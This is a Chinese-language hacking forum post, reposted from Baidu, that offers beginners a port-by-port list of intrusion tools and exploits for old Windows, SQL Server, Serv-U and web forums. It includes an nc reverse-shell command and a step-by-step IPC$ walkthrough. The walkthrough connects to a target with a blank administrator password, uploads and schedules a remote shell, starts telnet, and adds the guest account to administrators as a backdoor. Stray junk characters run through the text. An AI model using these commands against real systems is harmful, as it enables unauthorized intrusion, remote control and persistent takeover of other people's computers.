TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
( a$ p2 |! T! ?' a% B; E希望对新手入侵有帮助!
( I `- B5 Y- C# ]# k; J2 o& ` 1. 1433端口入侵/ I) E9 m3 J3 H% H5 r, | P1 L W
scanport.exe 查有1433的机器% x9 O7 ?, T- o* t& F
SQLScanPass.exe 进行字典暴破(字典是关键)
. @$ c& _% K0 k: R7 X# i 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。1 }6 ]' S: K# w# q8 R+ g7 @
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口& b! g! U9 J. K- h% Y/ U
(以上反向的,测试成功)
) m, D/ f) H2 K/ i- ~" m sqlhelloz.exe 入侵ip 1433 (这个是正向连接)1 K9 q2 L% D9 Z X3 {0 o N
2. 4899端口入侵5 g" f6 t7 B! ]" C
用4899过滤器.exe,扫描空口令的机器% Y. q: P; J5 p5 w' H
3. 3899的入侵3 q) H4 |# U" e' c8 E
对很早的机器,可以试试3389的溢出(win3389ex.exe)& l/ b% s, Q2 S" U1 G& V: b5 t
对2000的机器,可以试试字典暴破。(tscrack.exe)
( ], Y' x) r% M 4. 80入侵
. }$ n8 r" j8 w 对sp3以前的机器,可以用webdav入侵; {4 z# m- M3 ?" X
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)( z7 x- ]/ \! R0 }8 i% N
可以利用SQL进行注入。(啊D的注入软件)。
4 _' D& Z; V/ q1 E% _. C 5. serv-u入侵(21端口)
2 {. U9 q7 i& I7 z' R) S 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
9 o+ A5 Q- Z2 I) U9 U) N 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
+ O& U3 A" }2 z4 [ 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
8 w- R5 r2 X, j 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码; }$ T% y' [5 Y& B+ J
6. 554端口) q9 M0 U, T* I2 q, X& A
用real554.exe入侵。8 f8 h, d: M" ]0 o3 ^8 _0 h" b
7. 6129端口/ T T' f& Q+ M: U8 f2 z
用DameWare6129.exe入侵。) \5 Z1 ^6 b- m- T' L8 S
8. 系统漏洞
R4 m) b5 k0 N3 W4 d. a3 R; x 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。$ k8 R/ I5 R# P& m6 q: T# @
9. 3127等端口5 x3 X% w- x. x6 v* V6 @
0 u1 o ]* h( ]9 b 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。; f5 o0 ^$ |& H- G$ Q( j
10. 其他入侵/ z4 F5 X& h7 Y. J
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。7 _% z/ Z1 L8 t4 [" n" {
+ E+ E; K9 K0 f8 K2 r3 Q 经典IPC$入侵
2 @/ t, c/ {0 k# i3 t' R" v ?6 b
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
8 S5 b: `3 `/ @! V+ l 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
& t9 b9 F3 t; V8 @4 W2 m 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
& t8 N0 z9 h% u! u 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
/ Y! B' }2 X1 J 3. C:\>net time file://127.0.0.1/ s2 w0 O9 M* s
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。- V, r% y0 O5 ?5 l# Q M- `
4. C:\>at file://127.0.0.1/ 11:05 srv.exe) |/ ]7 R S E
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.* {9 f3 u0 w) u4 I. Q. X; D& ]5 |
5. C:\>net time file://127.0.0.1/
4 W) e" {0 g; @; ], L- K 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。' `- w4 s, e' q( H2 L) |" ?; c4 O6 u
6. C:\>telnet 127.0.0.1 99' l, [9 w# H# U6 a
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。( O; b/ G) b. X
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了3 w7 k$ `. s3 v) m5 X) Y
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
, t& Z! H( X# b5 d' g 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
! b# c5 k- Q$ F% o 8. C:\WINNT\system32>ntlm, |4 Y* G# I; M7 m6 ]7 _/ h
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
, Z7 Z7 ~% J& y6 |+ N' _ 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
0 [# K" }6 h' v1 \ 10. C:\>net user guest /active:yes
! D# ]2 N! O9 K' M9 q; B% S 将对方的Guest用户激活$ g& d8 G$ }5 v$ V
11. C:\>net user guest 1234- @) `+ L5 T+ Z2 R# X' T
将Guest的密码改为1234,或者你要设定的密码
, l, m& |2 j5 u$ U 12. C:\>net localgroup administrators guest /add* h/ _! l. o- p3 c& h6 ]
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|